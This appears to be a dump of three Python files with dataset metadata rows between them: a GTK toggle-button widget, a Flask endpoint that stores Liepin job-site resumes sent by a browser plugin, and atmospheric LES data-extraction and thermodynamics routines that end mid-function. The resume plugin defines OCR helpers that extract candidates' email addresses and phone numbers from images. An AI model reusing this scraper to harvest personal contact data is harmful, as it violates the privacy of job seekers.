self.image_button.connect('clicked', self.on_clicked)
if label is not None:
self.label = gtk.Label(label)
self.pack_start(self.label, False, False)
self.set_active(default)
def on_clicked(self, widget):
self.set_active(not self.active)
def get_active(self):
return self.active
def set_active(self, active):
if active != self.active:
self.active = active
if active:
self.image_button.set_from_pixbuf(self.active_pixbuf)
else:
self.image_button.set_from_pixbuf(self.inactive_pixbuf)
self.emit('toggled')
gobject.type_register(ToggleButton)
| bsd-3-clause | 515,769,753,873,767,230 | 33.775 | 103 | 0.614666 | false | 4.221548 | false | false | false |
followcat/predator | plugins/server/run.py | 1 | 4418 | # -*- coding: utf-8 -*-
import bs4
import time
import flask
import flask_restful
from flask_restful import Resource, reqparse
import tools.image
class LiepinPluginSyncObject(object):
committer = 'PLUGIN'
def __init__(self, url, htmlsource, base64email, base64phone):
self.url = url
self.htmlsource = htmlsource
self.base64email = base64email
self.base64phone = base64phone
self.raw_html, self.raw_yaml = self.parse_source()
self.info = self.generate_yaml()
self.loginfo = ''
self.parse_result = False
def generate_yaml(self):
info = dict()
info.update(self.raw_yaml)
info['committer'] = 'PLUGIN'
info['origin'] = u'猎聘爬取'
#info['email'] = self.email_from_base64()
#info['phone'] = self.phone_from_base64()
return info
def email_from_base64(self):
img = tools.image.image_from_base64(self.base64email)
preimg = tools.image.preprocess(img)
result = tools.image.image_to_string(preimg)
return result.replace(' ', '')
def phone_from_base64(self):
img = tools.image.image_from_base64(self.base64phone)
preimg = tools.image.preprocess(img)
result = tools.image.image_to_string(preimg)
return result.replace(' ', '')
def parse_source(self):
bs = bs4.BeautifulSoup(self.htmlsource, 'lxml')
details = dict()
details['date'] = time.time()
details['filename'] = self.url
idtag = bs.find('span', attrs={'data-nick':'res_id'})
details['id'] = idtag.text
details['originid'] = idtag.text
login_form = bs.find(class_='user-login-reg')
if login_form is not None:
self.loginfo = 'NoLoginError'
self.parse_result = False
return '', {}
side = bs.find(class_='side')
side.decompose()
footer = bs.find('footer')
footer.decompose()
javascripts = bs.findAll('script')
for js in javascripts:
js.decompose()
alinks = bs.findAll('a')
for a in alinks:
a.decompose()
content = bs.find(class_='resume')
self.parse_result = True
return content.prettify(), details
def add_new(self, cvstorage):
result = False
if self.info['id']:
if len(self.raw_html) < 500:
self.loginfo = (' ').join([self.info['id'], 'too short.'])
else:
if not cvstorage.exists(self.info['id']):
result = cvstorage.addcv(self.info['id'],
self.raw_html.encode('utf-8'), self.info)
else:
self.loginfo = (' ').join([self.info['id'], 'exists'])
else:
self.loginfo = "without ID."
if result is True:
print((' ').join(["Plugin add Liepin", self.info['id']]))
else:
print((' ').join(["Plugin add Liepin failed", self.loginfo]))
return result
class BrowserSyncAPI(Resource):
def __init__(self):
super(BrowserSyncAPI, self).__init__()
self.reqparse = reqparse.RequestParser()
self.LIEPIN_STO_CV = flask.current_app.config['LIEPIN_STO_CV']
self.reqparse.add_argument('url', type = unicode, location = 'json')
self.reqparse.add_argument('html', type = unicode, location = 'json')
self.reqparse.add_argument('base64email', type = unicode, location = 'json')
self.reqparse.add_argument('base64phone', type = unicode, location = 'json')
def post(self):
args = self.reqparse.parse_args()
url = args['url']
html = args['html']
base64email = args['base64email']
base64phone = args['base64phone']
id = ''
result = False
if 'liepin' in url:
lpso = LiepinPluginSyncObject(url, html, base64email, base64phone)
result = lpso.add_new(self.LIEPIN_STO_CV)
if result is True:
id = lpso.info['id']
return {'code': 200, 'url': url, 'result': result, 'id': id}
app = flask.Flask(__name__)
app.config.from_object('plugins.server.settings')
api = flask_restful.Api(app)
api.add_resource(BrowserSyncAPI, '/api/browsersync', endpoint = 'browsersync')
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5888, threaded=True)
| lgpl-3.0 | 8,573,186,696,191,516,000 | 33.186047 | 86 | 0.570748 | false | 3.605887 | false | false | false |
JaakkoAhola/DESIGN | LES2emu.py | 1 | 35416 | # Functions extracting emulator and any other data from LES output NetCDF files,
# and collection of functions for generating LES inputs.
#
# Tomi Raatikanen 18.1.2019
#
# Functions
# =========
# Use Python import to make these functions available, e.g. from LES2emu import GetEmuVars, get_netcdf_variable
#
# a) Functions for extracting data from the LES outputs
# GetEmu2Vars(path)
# GetEmu1Vars(fname,tstart,tend,[ttol,start_offset,end_offset])
# get_netcdf_variable(fname,var_name,target_time,[end_time])
# extract_write_data(fname_template,specs,[name_out,nmax])
# get_netcdf_updraft(fname,tstart,tend,[ttol,tol_clw])
#
# b) Functions for generating LES inputs
# calc_cloud_base(p_surf,theta,rw)
# calc_lwc_altitude(p_surf,theta,rw,zz)
# solve_rw(p_surf,theta,lwc,zz)
# solve_rw_lwp(p_surf,theta,lwp,pblh)
#
# c) Helper functions
# calc_psat_w(T)
# calc_sat_mixr(p,T)
# calc_rh(rw,T,press)
#
# Notes
# =====
# 1) Input file name should contain complete path in addition to the file name
# e.g. '/ibrix/arch/ClimRes/aholaj/case_emulator_DESIGN_v1.4.0_LES_cray.dev20170324_LVL4/emul01/emul01.ts.nc'
# 2) Voima requires python 2.7.10, so execute "module load Python/2.7.10"
#
def GetEmu1Vars(fname,tstart,tend,ttol=3600.,start_offset=0,end_offset=0):
# Function calculates LES output variables for emulator v1.0 as defined in the ECLAIR proof-of-concept document
# https://docs.google.com/document/d/1L-YyJLhtmLYg4rJYo5biOW96eeRC7z_trZsow_8TbeE/edit
# Inputs:
# fname Complete path and name of a time statistics file (*.ts.nc)
# start, tend Time window (s)
# Optional inputs
# ttol Time tolelance (s) for finding averaging window
# start_offset Point offset to start index (time in the NetCDF files is the save time, so typically should ignore the first points)
# end_offset -||- end ind index
#
# Example:
# file='/ibrix/arch/ClimRes/aholaj/case_emulator_DESIGN_v1.4.0_LES_cray.dev20170324_LVL4/emul01/emul01.ts.nc'
# tstart=2.5*3600
# tend=3.5*3600
# cfrac, CDNC, prcp, dn, we, cfrac_std, CDNC_std, prcp_std, dn_std, we_std = GetEmu1Vars(file,tstart,ttol=10.,start_offset=1)
#
import os
import netCDF4 as netcdf
import numpy
#
# Outputs
cfrac=-999. # Cloud fraction
CDNC=-999. # Cloud droplet number concentration in cloudy columns (#/kg)
prcp=-999. # Precipitation tendency = domain mean surface precipitation (kg/m^2/s)
dn=-999. # In-cloud aerosol number loss tendency = change in interstitial aerosol+cloud droplet number concentration in cloudy columns (#/kg/s)
we=-999. # Mixing between FT and BL = domeain mean entrainment velocity (m/s)
#
# ... and their standard deviations
cfrac_std=-999.; CDNC_std=-999.; prcp_std=-999.; dn_std=-999.; we_std=-999.
#
# File must exist
if not os.path.lexists(fname):
print fname+' not found!'
return cfrac, CDNC, prcp, dn, we, cfrac_std, CDNC_std, prcp_std, dn_std, we_std,
#
# Open the target NetCDF file
ncid = netcdf.Dataset(fname,'r')
#
# Time
# ====
if 'time' not in ncid.variables:
print 'Time not found from '+fname+'!'
return cfrac, CDNC, prcp, dn, we, cfrac_std, CDNC_std, prcp_std, dn_std, we_std,
times = ncid.variables['time']
#
# Find the closest matching time points
ind_tstart=0
ind_tend=0
i=0
for t in times:
if abs(t-tstart)<abs(times[ind_tstart]-tstart): ind_tstart=i
if abs(t-tend)<abs(times[ind_tend]-tend): ind_tend=i
i+=1
#
if abs(times[ind_tstart]-tstart)>ttol or abs(times[ind_tend]-tend)>ttol:
print 'Matching start or end time not found from '+fname+'!'
return cfrac, CDNC, prcp, dn, we, cfrac_std, CDNC_std, prcp_std, dn_std, we_std,
#
# Apply offset (typically the first point is ignored
ind_tstart+=start_offset
ind_tend+=end_offset
if ind_tstart<0 or ind_tstart>ind_tend or ind_tend>=len(times):
print 'Invalid data range for '+fname+': ',ind_tstart,ind_tend,len(times)
return cfrac, CDNC, prcp, dn, we, cfrac_std, CDNC_std, prcp_std, dn_std, we_std,
#
#
# Outputs
# ========
# Cloud fraction
if 'cfrac' not in ncid.variables:
print 'Cloud fraction not found from '+fname+'!'
return cfrac, CDNC, prcp, dn, we, cfrac_std, CDNC_std, prcp_std, dn_std, we_std,
#
# Need cloud fractions for normalizing domain mean interstitial and cloud droplet number concentrations
cfrac_ts=ncid.variables['cfrac'][ind_tstart:ind_tend]
ncfrac = sum( cfrac_ts>0.0 ) # The number of non-zero cloud fractions
#
cfrac = numpy.mean( cfrac_ts )
cfrac_std = numpy.std( cfrac_ts )
#
if 'Nc_ic' in ncid.variables: # Level 4 = SALSA microphysics
# Cloud droplet number concentration averaged over cloudy columns (#/kg)
CDNC,CDNC_std=average_scaled(ncid.variables['Nc_ic'][ind_tstart:ind_tend],cfrac_ts)
#
# Surface precipitation (kg/m^2/s)
if ind_tstart < ind_tend:
prcp = numpy.mean( ncid.variables['rmH2Opr'][ind_tstart:ind_tend] )
prcp_std = numpy.std( ncid.variables['rmH2Opr'][ind_tstart:ind_tend] )
else:
prcp = ncid.variables['rmH2Opr'][ind_tstart]
prcp_std = -999.
#
# Change in in-cloud aerosol+cloud droplet number concentration
if ncfrac>=2: # Linear fit needs at least two data points
tt = ncid.variables['time'][ind_tstart:ind_tend] # Time (s) vector
nc = ncid.variables['Nc_ic'][ind_tstart:ind_tend] # Cloud droplets (domain mean)
nc += ncid.variables['Na_int'][ind_tstart:ind_tend] # + interstitial aerosol (domain mean)
# Normalize by cloud fraction => concentrations for cloudy columns
i=0
for cf in cfrac_ts:
if cf>0:
nc[i]/=cf
else:
# Divide-by-zero => NaN
nc[i]=float('nan')
i+=1
#
a,dn,a_std,dn_std=ls_fit(tt,nc) # Least squares fit (nc=a+b*tt)
else:
dn=-999.
dn_std=-999.
else: # Level 3 = saturation adjustment method (given CDNC)
# Cloud droplet number concentration (#/kg): fixed
if ind_tstart < ind_tend:
CDNC = numpy.mean( ncid.variables['CCN'][ind_tstart:ind_tend] )
CDNC_std = numpy.std( ncid.variables['CCN'][ind_tstart:ind_tend] )
else:
CDNC = ncid.variables['CCN'][ind_tstart]
CDNC_std = -999.
#
# Surface precipitation (kg/m^2/s): variable prcp is in W/m^2=J/s/m^2, which can be
# converted to kg using latent heat of vaporization (2.5e+06 J/kg)
if ind_tstart < ind_tend:
prcp = numpy.mean( ncid.variables['prcp'][ind_tstart:ind_tend] )/2.5e6
prcp_std = numpy.std( ncid.variables['prcp'][ind_tstart:ind_tend] )/2.5e6
else:
prcp = ncid.variables['prcp'][ind_tstart]/2.5e6
prcp_std = -999.
#
# Change in in-cloud aerosol+cloud droplet number concentration: N/A
#
# Entrainment velocity (m/s)
# we=dz/dt+D*z, where z is PBL height and D is large scale divergence (1.5e-6 1/s) (see e.g. Kazil et al., ACP, 2016).
if ind_tstart < ind_tend:
# Must have at least two points for the slope, but should haev more than that
zz = ncid.variables['zi1_bar'][ind_tstart:ind_tend] # PBL height (m) vector
tt = ncid.variables['time'][ind_tstart:ind_tend] # Time (s) vector
a,dzdt,a_std,dzdt_std=ls_fit(tt,zz) # Least squares fit (zz=a+b*tt)
z=numpy.mean(zz) # Mean PBL height
we=dzdt+1.5e-6*z
we_std=dzdt_std
else:
we = -999.
we_std = -999.
#
# Close file
ncid.close()
#
# All done
return cfrac, CDNC, prcp, dn, we, cfrac_std, CDNC_std, prcp_std, dn_std, we_std,
def get_netcdf_updraft(fname,tstart,tend,ttol=3600.,tol_clw=1e-5):
# Function for calculating mean positive updraft velocities and cloud droplet number concentrations
# at cloud base (see Romakkaniemi et al., 2009) from 4D data (*.nc).
#
# Romakkaniemi, S., G. McFiggans, K.N. Bower, P. Brown, H. Coe, T.W. Choularton, A comparison between
# trajectory ensemble and adiabatic parcel modelled cloud properties and evaluation against airborne
# measurements, J. Geophys. Res., doi:10.1029/2008JD011286, 2009
#
# Inputs:
# fname Complete file path and name (*.nc)
# start, tend Averaging time window (s)
# Optional inputs
# ttol Time tolelance (s) for finding averaging window
# tol_clw Cloud liquid water mixing ratio (kg/kg) for the cloud base
#
# Example:
# file='/arch/eclair/UCLALES-SALSA_training_simulations/case_emulator_DESIGN_v3.0.0_LES_ECLAIR_branch_ECLAIRv2.0.cray.fast_LVL3/emul001/emul001.nc'
# w,cdnc,cdnc_w,n=get_netcdf_updraft(file,9000.,12600.,ttol=10.)
# print w,cdnc,cdnc_w,n
#
import os
import netCDF4 as netcdf
import numpy
#
# File must exist
if not os.path.lexists(fname):
raise RuntimeError(fname+' not found!')
#
# Open the target NetCDF file
ncid = netcdf.Dataset(fname,'r')
#
if 'time' not in ncid.variables:
raise RuntimeError('Time not found from '+fname+'!')
elif 'w' not in ncid.variables:
raise RuntimeError('Variable w not found from '+fname+'!')
elif 'l' not in ncid.variables:
raise RuntimeError('Variable l not found from '+fname+'!')
elif 'time' not in ncid.variables['w'].dimensions or 'time' not in ncid.variables['l'].dimensions:
raise RuntimeError('Time is not a dimension for w or l (file '+fname+')!')
#
# Time
times = ncid.variables['time']
#
# Dimensions
dims=ncid.variables['l'][0,].shape # x, y, z
#
# Optional: CDNC from UCLALES-SALSA simulations
cdnc_calc='S_Nc' in ncid.variables
#
#
# Outputs
wpos=0. # Mean positive updraft velocity at the cloud base (m/s)
w2pos=0. # Velocity weighted mean positive updraft velocity at the cloud base (m/s)
cdnc_p=0. # Mean cloud droplet number concentration at the cloud base with positive updraft velocity (1/kg)
cdnc_wp=0. # Velocity weigted mean cloud droplet number concentration at the cloud base with positive updraft velocity (1/kg)
n=0 # Number of cloud bases with positive updraft (-)
#
ind=-1
for tt in times:
# Time range
ind+=1
if tt<tstart-ttol:
continue
elif tt>tend+ttol:
break # Assuming monotonic time
#
# Data
w=ncid.variables['w'][ind,]
l=ncid.variables['l'][ind,]
if cdnc_calc: cdnc=ncid.variables['S_Nc'][ind,]
#
# Calculations
if True:
# This is much faster
for i in range(0,dims[0]):
for j in range(0,dims[1]):
kk, = numpy.where(l[i,j,:]>tol_clw)
if len(kk)>0 and w[i,j,kk[0]]>0.:
k=kk[0]
n+=1
wpos+=w[i,j,k]
w2pos+=w[i,j,k]**2
if cdnc_calc:
cdnc_p+=cdnc[i,j,k]
cdnc_wp+=w[i,j,k]*cdnc[i,j,k]
else:
# The old method
i=0; j=0
while i<dims[0] and j<dims[1]:
k=0
while k<dims[2]:
if l[i,j,k]>tol_clw:
# Found cloud base, but only the positive updraft velocities are counted
if w[i,j,k]>0.:
n+=1
wpos+=w[i,j,k]
w2pos+=w[i,j,k]**2
if cdnc_calc:
cdnc_p+=cdnc[i,j,k]
cdnc_wp+=w[i,j,k]*cdnc[i,j,k]
break
k+=1
if j+1<dims[1]:
j+=1
else:
i+=1
j=0
#
if n>0:
w2pos/=wpos
wpos/=n
if cdnc_calc:
cdnc_p/=n
cdnc_wp/=(wpos*n)
else:
cdnc_p=-999.
cdnc_wp=-999.
else:
wpos=-999.
w2pos=-999.
cdnc_p=-999.
cdnc_wp=-999.
#
# Close file
ncid.close()
#
# Outputs: mean positive updraft velocity and cloud droplet number concentrations (mean and weighted with velocity) at the cloud base
return wpos,w2pos,cdnc_p,cdnc_wp,n
def get_netcdf_variable(fname,var_name,start_time,end_time=-10000.,ttol=3600.,start_offset=0,end_offset=0):
# Function for extracting data from a NetCDF file based on the given time value (or range).
#
# Inputs:
# fname Complete file path and name
# var_name NetCDF variable name
# start_time Target or start (when end_time is specified) time value
# Optional inputs
# end_time Optional end time value
# ttol Time tolelance (s) for finding averaging window
# start_offset Point offset to start index (time in the NetCDF files is the save time, so typically should ignore the first points)
# end_offset -||- end index
#
# Example:
# file='/ibrix/arch/ClimRes/aholaj/case_emulator_DESIGN_v1.4.0_LES_cray.dev20170324_LVL4/emul01/emul01.ts.nc'
# lmax=get_netcdf_variable(file,'lmax',3*3600,ttol=10)
# lmax=get_netcdf_variable(file,'lmax',2.5*3600,3.5*3600,ttol=10.,start_offset=1)
import os
import numpy
import netCDF4 as netcdf
#
# File must exist
if not os.path.lexists(fname): raise RuntimeError(fname+' not found!')
#
# Open the target NetCDF file
ncid = netcdf.Dataset(fname,'r')
#
if 'time' not in ncid.variables:
raise RuntimeError('Time not found from '+fname+'!')
elif var_name not in ncid.variables:
raise RuntimeError('Variable '+var_name+' not found from '+fname+'!')
elif 'time' not in ncid.variables[var_name].dimensions:
raise RuntimeError('Time is not a dimension for '+var_name+' (file '+fname+')!')
#
# Time
times = ncid.variables['time']
#
# Find the correct time value
i=0
if end_time>-9999.:
# Time from start_time to end_time (closests matching start and end time values)
ind_start=0
ind_end=0
for tt in times:
# Closest match
if abs(tt-start_time)<abs(times[ind_start]-start_time): ind_start=i
if abs(tt-end_time)<abs(times[ind_end]-end_time): ind_end=i
i+=1
#
if abs(times[ind_start]-start_time)>ttol or abs(times[ind_end]-end_time)>ttol:
print 'Matching start or end time not found from '+fname+'!'
return -999.
#
# Apply offset (typically the first point is ignored
ind_start+=start_offset
ind_end+=end_offset
if ind_start<0 or ind_start>ind_end or ind_end>=len(times):
print 'Invalid data range for '+fname+'!'
return -999.
#
# Average over time dimension
ind=ncid.variables[var_name].dimensions.index('time')
#
out=numpy.mean( ncid.variables[var_name][ind_start:ind_end,],axis=ind )
# Could add standard deviations?
#out_std = numpy.std( ncid.variables[var_name][ind_start:ind_end,],axis=ind )
else:
# Single time value (closest match)
ind=0
for tt in times:
# Closest match
if abs(tt-start_time)<abs(times[ind]-start_time): ind=i
i=i+1
#
if abs(times[ind]-tstart)>ttol:
print 'Matching time not found from '+fname+'!'
return -999.
#
# Apply offset (typically the first point is ignored
ind+=start_offset
if ind<0 or ind>=len(times):
print 'Invalid index for '+fname+'!'
return -999.
#
out=ncid.variables[var_name][ind,]
#
# Close file
ncid.close()
return out
def GetEmu2Vars(path):
# Function calculates LES output variables for emulator v2.0 as defined in the ECLAIR proof-of-concept document
# https://docs.google.com/document/d/1L-YyJLhtmLYg4rJYo5biOW96eeRC7z_trZsow_8TbeE/edit
#
# Inputs:
# path Complete path the root data
# Outputs:
# A 2D array of values as described below
#
# Example:
# path='/arch/eclair/UCLALES-SALSA_training_simulations/case_emulator_DESIGN_v3.0.0_LES_ECLAIR_branch_ECLAIRv2.0.cray.fast_LVL3/'
# data=GetEmu2Vars(path)
#
import os
#
# Time window
tstart=2.5*3600
tend=3.5*3600
#
if path.endswith('/'):
fmt='emul%03u/emul%03u'
else:
fmt='/emul%03u/emul%03u'
#
# Examine the data files
out=[]
i=1
while True:
# Data must exist
if not os.path.lexists( (path+fmt+'.nc')%(i,i) ) and not os.path.lexists( (path+fmt+'.ts.nc')%(i,i) ):
if i==1:
raise RuntimeError('Data not found from '+path+'!')
else:
break
#
# Emulator v2.0 variables
# - Tolerance for the start and end times is +/- 10 s
# - No need to ignore the first point when averaging instantaneous variables (rain processes and w calculated form 4D data,)
#
# Data file
file=(path+fmt+'.ts.nc')%(i,i)
# 1a) Rain water loss (evaporation + surface precipitation)
# Change in column rain water due to condensation (kg/m^2/s)
cond=get_netcdf_variable(file,'cond_rr',tstart,tend,ttol=10.)
# Change in column rain water due to sedimentation (kg/m^2/s)
sedi=get_netcdf_variable(file,'sedi_rr',tstart,tend,ttol=10.)
#
# 1b) Rain water production (not including divergence - with that the total production is the same as total loss)
# Change in column rain water due to coagulation (kg/m^2/s)
coag=get_netcdf_variable(file,'coag_rr',tstart,tend,ttol=10.)
# Change in column rain water due to autoconversion (kg/m^2/s)
auto=get_netcdf_variable(file,'auto_rr',tstart,tend,ttol=10.)
# Change in column rain water due to diagnostics (kg/m^2/s)
diag=get_netcdf_variable(file,'diag_rr',tstart,tend,ttol=10.)
#
# 2) Precipitation statistics (ignore the first point, which is an everage from the previous time period)
# Surface precipitation rate (W/m^2)
prcp=get_netcdf_variable(file,'prcp',tstart,tend,ttol=10.,start_offset=1)
# 1 W = J/s, which can be converted to mass flux by using latent heat of water (2.5e+6 J/kg)
prcp/=2.5e6 # kg/m^2/s
#
# 3) Cloud base positive updraft velocity (m/s)
file_4d=(path+fmt+'.nc') % (i,i)
wpos,w2pos,cdnc_p,cdnc_wp,n = get_netcdf_updraft(file_4d,tstart,tend,ttol=10.)
#
out.append([i,cond,sedi,coag,auto,diag,prcp,wpos,w2pos,cdnc_p,cdnc_wp,n])
#
if i==1: print 'id cond sedi coag auto diag prcp wpos w2pos cdnc_p cdnc_wp n'
print ('%2g %8.3e %8.3e %8.3e %8.3e %8.3e %8.3e %6.4f %6.4f %7.3e %7.3e %7g')%(i,cond,sedi,coag,auto,diag,prcp,wpos,w2pos,cdnc_p,cdnc_wp,n)
#
i+=1
#
# Output lines are: id, cond, sedi, coag, auto, diag, prcp, wpos, w2pos, cdnc_p, cdnc_wp, n
return out
def extract_write_data(fname_template,specs,name_out='',nmax=9999,skip_errs=False):
# Extract and process data from one or more NetCDF files, and write it to a text file (optional)
#
# Inputs:
# fname_template File name template with complete path
# e.g. '/ibrix/arch/ClimRes/aholaj/case_emulator_DESIGN_v1.4.0_LES_cray.dev20170324_LVL4/emul%02u/emul%02u.ts.nc'
# specs List of variables including slizing and numpy operations
# name_out Output file name (optional)
# nmax Maximum number of files (optional)
# skip_errs Don't stop on errors - needed when complete data set is not available (saves just NaN)
#
# Examples:
# fname_template='/ibrix/arch/ClimRes/aholaj/case_emulator_DESIGN_v1.4.0_LES_cray.dev20170324_LVL4/emul%02u/emul%02u.ts.nc'
# specs=['cfrac[10]','wmax[10]','lwp_bar[10]']
# aa=extract_write_data(fname_template,specs,name_out='tmp.dat')
# specs=['cfrac']
# aa=extract_write_data(fname_template,specs,name_out='tmp.dat')
#
# fname_template='/ibrix/arch/ClimRes/aholaj/case_emulator_DESIGN_v1.4.0_LES_cray.dev20170324_LVL4/emul%02u/emul%02u.ps.nc'
# specs=['numpy.amax(l[10,:])']
# aa=extract_write_data(fname_template,specs,name_out='tmp.dat')
#
# fname_template='/ibrix/arch/ClimRes/aholaj/case_emulator_DESIGN_v1.4.0_LES_cray.dev20170324_LVL4/emul%02u/emul%02u.nc'
# specs=['numpy.amax(numpy.amax(numpy.amax(l[2,:],axis=0),axis=0),axis=0)']
# aa=extract_write_data(fname_template,specs,name_out='tmp.dat')
#
import os
import netCDF4 as netcdf
import numpy
import sys
#
# Function for converting command line commands to NetCDF format
def interpret_fun(cmd):
# Interpret function call, e.g. 'numpy.amax(l[89,:])': just replace variable name x with "ncid.variables['x']",
# e.g. 'numpy.amax(l[2,100,100,:])', numpy.amax(l[89,:])',numpy.amax(l)' or 'numpy.amax(P_Rwca,axis=0)'
# Now also function calls like "thl[numpy.abs(ncid.variables['time'][:]-10800.).argmin(),:]" are accepted!
frst=-1
lst=-1
i=0
for tt in cmd:
if (tt=='[' or tt==')' or tt==',') and lst==-1:
# e.g. 'numpy.amax(l[89,:])', 'numpy.amax(l)', 'numpy.amax(P_Rwca,axis=0)' or thl[numpy.abs(ncid.variables['time'][:]-10800.).argmin(),:]"
lst=i
if frst==0:
fun='ncid.variables[\''+cmd[frst:lst]+'\']'+cmd[lst:]
else:
fun=cmd[:frst+1]+'ncid.variables[\''+cmd[frst+1:lst]+'\']'+cmd[lst:]
return fun
elif tt=='(' or i==0:
frst=i
i+=1
# No solution
return cmd
#
# The old version
frst=-1
lst=-1
i=0
for tt in cmd:
if (tt=='[' or tt==')' or tt==',') and lst==-1:
# e.g. 'numpy.amax(l[89,:])', 'numpy.amax(l)' or 'numpy.amax(P_Rwca,axis=0)'
lst=i
elif tt=='(':
frst=i
i+=1
# Return complete command as fun
fun=cmd[:frst+1]+'ncid.variables[\''+cmd[frst+1:lst]+'\']'+cmd[lst:]
return fun
#
#
# Any '%' in file name template will be replaced by counter i=1,2,3,...
n=fname_template.count('%')
if n==0: nmax=1 # Template as is
#
# Output to text file
if len(name_out): fid_out=open(name_out,'w')
#
nerr=0
files=0 # Count files
values=0 # Count values extracted
out=[] # Complete output
for i in range(1,nmax):
# File name with full path
if n==0:
file_name=fname_template
elif n==1:
file_name=fname_template % (i)
elif n==2:
file_name=fname_template % (i,i)
elif n==3:
file_name=fname_template % (i,i,i)
else:
# No more than three?
file_name=fname_template % (i,i,i,i)
#
ncid=0
if not os.path.isfile(file_name):
if i==1 and n>0: print file_name+' not found!'
if not skip_errs or i>90:
break
else:
# Ignore missing file (<90)
ncid=-999
nerr+=1
msg=file_name+' not found!'
#
#
#row=[] # one row
#for nam in specs:
# row.append(obj)
#
#out.append(row)
#
# Save data
#if len(name_out):
# # Save variables as space separated strings
# if not hasattr(obj, '__iter__'):
# # Scalar
# fid_out.write( str(obj)+" " )
# values+=1
# else:
# # Vector
# for val in obj:
# fid_out.write( str(val)+" " )
# values+=1
#
#continue
#
# Open input file
if ncid==0: ncid = netcdf.Dataset(file_name,'r')
#
# Outputs
row=[] # one row
for nam in specs:
# Interpret command
if ncid<0:
# File not found
obj = float('nan') # Scalar works quite often
elif '(' in nam:
# There is a call to a function
fun=interpret_fun(nam)
try:
obj =eval( fun )
except:
if not skip_errs:
print "Unexpected error:", sys.exc_info()[0]
raise
#
# Ignore errors
obj = float('nan') # Scalar works quite often
nerr+=1
msg=sys.exc_info()[0]
elif '[' in nam:
# Selected data range
name=nam[:nam.index('[')]
ind=nam[nam.index('['):]
try:
obj =eval( 'ncid.variables[\''+name+'\']'+ind )
except:
if not skip_errs:
print "Unexpected error:", sys.exc_info()[0]
raise
#
# Ignore errors
obj = float('nan') # Scalar works quite often
nerr+=1
msg=sys.exc_info()[0]
else:
# Data as is
try:
obj = ncid.variables[nam][:]
except:
if not skip_errs:
print "Unexpected error:", sys.exc_info()[0]
raise
#
# Ignore errors
obj = float('nan') # Scalar works quite often
nerr+=1
msg=sys.exc_info()[0]
#
# Append data
row.append(obj)
#
# Save data
if len(name_out):
# Save variables as space separated strings
if not hasattr(obj, '__iter__'):
# Scalar
fid_out.write( str(obj)+" " )
values+=1
else:
# Vector/matrix
for val in obj:
if not hasattr(val, '__iter__'):
# Scalar (1D vector)
fid_out.write( str(val)+" " )
values+=1
else:
# Vector (2D matrix)
for val2 in val:
fid_out.write( str(val2)+" " )
values+=1
#
# New line
if len(name_out): fid_out.write( "\r\n" )
#
out.append(row)
#
if ncid>0: ncid.close()
files+=1
#
if len(name_out):
fid_out.close()
print str(files)+' files examined, '+str(values)+' values saved to '+name_out
if nerr>0: print ' '+str(nerr)+' error(s) ignored: ',msg
#
# Return the data
return out
#
# LES inputs and outputs
#
def calc_cloud_base(p_surf,theta,rw):
# Calulate cloud base heigh when liquid water potential temperature (theta [K]) and water
# vapor mixing ratio (rw [kg/kg]) are constants. Surface pressure p_surf is given in Pa.
# For more information, see "lifted condensation level" (LCL).
#
# Constants
R=287.04 # Specific gas constant for dry air (R_specific=R/M), J/kg/K
Rm=461.5 # -||- for water
ep2=Rm/R-1.0 #M_air/M_water-1
cp=1005.0 # Specific heat for a constant pressure
rcp=R/cp
cpr=cp/R
g=9.8
p00=1.0e+05
#
# Integrate to cloud base altitude
dz=1. # 1 m resolution
z=0. # The first altitude
press=p_surf # Start from surface
RH=0
while RH<100 and z<10000:
# Temperature (K)
tavg=theta*(press/p00)**rcp
#
# Current RH (%)
RH=calc_rh(rw,tavg,press)
if RH>100: break
#
# From z to z+dz
z+=dz
# Virtual temperature: T_virtual=T*(1+ep2*rl)
xsi=(1+ep2*rw)
# Pressure (Pa)
press-=g*dz*press/(R*tavg*xsi)
#
# No cloud
if RH<100: return -999
#
# Return cloud base altitude
return z
def calc_lwc_altitude(p_surf,theta,rw,zz):
# Calculate cloud water mixing ratio at a given altitude z (m) when liquid water potential
# temperature (theta [k]) and water vapor mixing ratio (rw [kg/kg]) are constants.
# Surface pressure p_surf is given in Pa.
#
# Constants
R=287.04 # Specific gas constant for dry air (R_specific=R/M), J/kg/K
Rm=461.5 # -||- for water
ep2=Rm/R-1.0 #M_air/M_water-1
cp=1005.0 # Specific heat for a constant pressure
rcp=R/cp
cpr=cp/R
g=9.8
p00=1.0e+05
alvl = 2.5e+06 # ! latent heat of vaporization
#
# a) Integrate to cloud base altitude
dz=1. # 1 m resolution
z=0. # The first altitude
press=p_surf # Start from surface
RH=0
while z<zz:
# Temperature (K)
tavg=theta*(press/p00)**rcp
#
# Current RH (%)
RH=calc_rh(rw,tavg,press)
if RH>100: break
#
# From z to z+dz
z+=dz
# Virtual temperature: T_virtual=T*(1+ep2*rl)
xsi=(1+ep2*rw)
# Pressure (Pa)
press-=g*dz*press/(R*tavg*xsi)
#
# No cloud or cloud water
if RH<100: return 0.0
#
# b) Integrate up to given altitude
while z<zz:
# From z to z+dz
z+=dz
#
# Moist adiabatic lapse rate
q_sat=calc_sat_mixr(press,tavg)
tavg-=g*(1+alvl*q_sat/(R*tavg))/(cp+alvl**2*q_sat/(Rm*tavg**2))*dz
#
# New pressure
xsi=(1+ep2*q_sat)
press-=g*dz*press/(R*tavg*xsi)
#
# Return cloud water mixing ratio = totol - vapor
return rw-q_sat
def solve_rw(p_surf,theta,lwc,zz):
# Solve total water mixing ratio (rw, kg/kg) from surface pressure (p_surf, Pa), liquid water potential
# temperature (theta, K) and liquid water mixing ratio (lwc) at altitude zz (m)
#
# Constants
R=287.04 # Specific gas constant for dry air (R_specific=R/M), J/kg/K
Rm=461.5 # -||- for water
ep2=Rm/R-1.0 #M_air/M_water-1
cp=1005.0 # Specific heat for a constant pressure
rcp=R/cp
cpr=cp/R
g=9.8
p00=1.0e+05
alvl = 2.5e+06 # ! latent heat of vaporization
#
# Mimimum water vapor mixing ratio is at least lwc
q_min=lwc
#
# Maximum water vapor mixing ratio is unlimited, but should be smaller
# than that for a cloud which base is at surface
t_surf=theta*(p_surf/p00)**rcp
q_max=calc_sat_mixr(p_surf,t_surf)
#
k=0
while k<100:
q_new=(q_min+q_max)/2
lwc_calc=calc_lwc_altitude(p_surf,theta,q_new,zz)
#
if abs(lwc-lwc_calc)<1e-7:
break
elif lwc<lwc_calc:
q_max=q_new
else:
q_min=q_new
k+=1
# Failed
if k==50: return -999
#
return q_new
def calc_lwp(p_surf,theta,pblh,rt):
